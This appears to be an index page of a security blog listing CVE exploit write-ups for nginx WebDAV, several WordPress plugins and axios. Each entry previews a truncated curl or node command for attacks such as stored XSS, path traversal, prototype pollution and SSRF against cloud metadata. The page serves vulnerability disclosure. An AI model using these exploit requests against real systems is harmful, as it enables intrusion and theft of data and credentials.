Articles

§06 · Field notes

CVE · PLUGINS · ZERO-DAYS
GitHub

CVE-2026-27654: nginx-dav-cve-2026-27654

## The Exploit Requires only network access to a DAV-enabled aliased prefix location; no privileged credentials are needed if the `MOVE`/`COPY` endpoint is exposed. ```bash curl -i -s -X MOVE 'http://TARGET/webdav/secret.txt' \ -H 'Host: TARGET' \ -H 'Destination: http://TA...

GitHub

CVE-2026-2868

## The Exploit Requires an authenticated contributor-level user or above to store a malicious `separatorIconSVG` block attribute. ```bash # store the malicious separatorIconSVG payload in a Gutenberg block curl -sk -X POST "https://target...

Read article →
GitHub

CVE-2026-5159

## The Exploit An authenticated contributor (or higher) can store script code in the Instagram Feed widget settings and make it execute for any later visitor. ```bash # Store the payload in the Instagram Feed widget configuration curl 'ht...

Read article →
GitHub

CVE-2026-5192

## The Exploit Unauthenticated attackers can abuse a public Forminator file-upload form with Save and Continue enabled by submitting a crafted `upload-1[file][file_path]` value pointing outside the uploads directory. ```bash curl 'http://...

Read article →
GitHub

CVE-2026-5063

## The Exploit Unauthenticated attackers can submit a malicious field value through the public `submit_nex_form` handler and later trigger it when the record display page renders saved submissions. ```bash curl -i -X POST 'http://TARGET/?...

Read article →
GitHub

CVE-2026-2902

## The Exploit Unauthenticated attackers can store a crafted placeholder string in any page-backed content that WP Meteor rewrites. ```bash curl -i -X POST "http://TARGET/wp-comments-post.php" \ -H "Content-Type: application/x-www-form-...

Read article →
GitHub

CVE-2026-40175: axios

## The Exploit Attacker needs only the ability to inject a malicious sponsor record into `process-sponsors.js` during the docs build process. ```bash node - <<'NODE' const allSponsorsProcessedData = [ { slug: 'evil', tier: '__proto__', ...

Read article →
GitHub

CVE-2026-0593

## The Exploit Attacker needs a valid WordPress account at Subscriber level or higher. ```bash curl -i -s -X POST "https://TARGET/wp-admin/admin-ajax.php" \ -H "Content-Type: application/x-www-form-urlencoded" \ -H "Cookie: wordpress_...

Read article →
GitHub

CVE-2026-1208

## The Exploit The attacker only needs an authenticated WordPress administrator to load a malicious page. ```bash curl -i 'https://TARGET/wp-admin/admin.php?page=ffw_function_settings' \ -H 'Cookie: wordpress_logged_in_XXXXXXXXXXXXXXXXX...

Read article →
GitHub

CVE-2026-0807

## The Exploit No authentication required: any visitor can hit the plugin's proxy endpoint and make it fetch arbitrary URLs. ```bash curl -i -sS 'https://TARGET/template-proxy/?remote_url=http://169.254.169.254/latest/meta-data/instance-i...

Read article →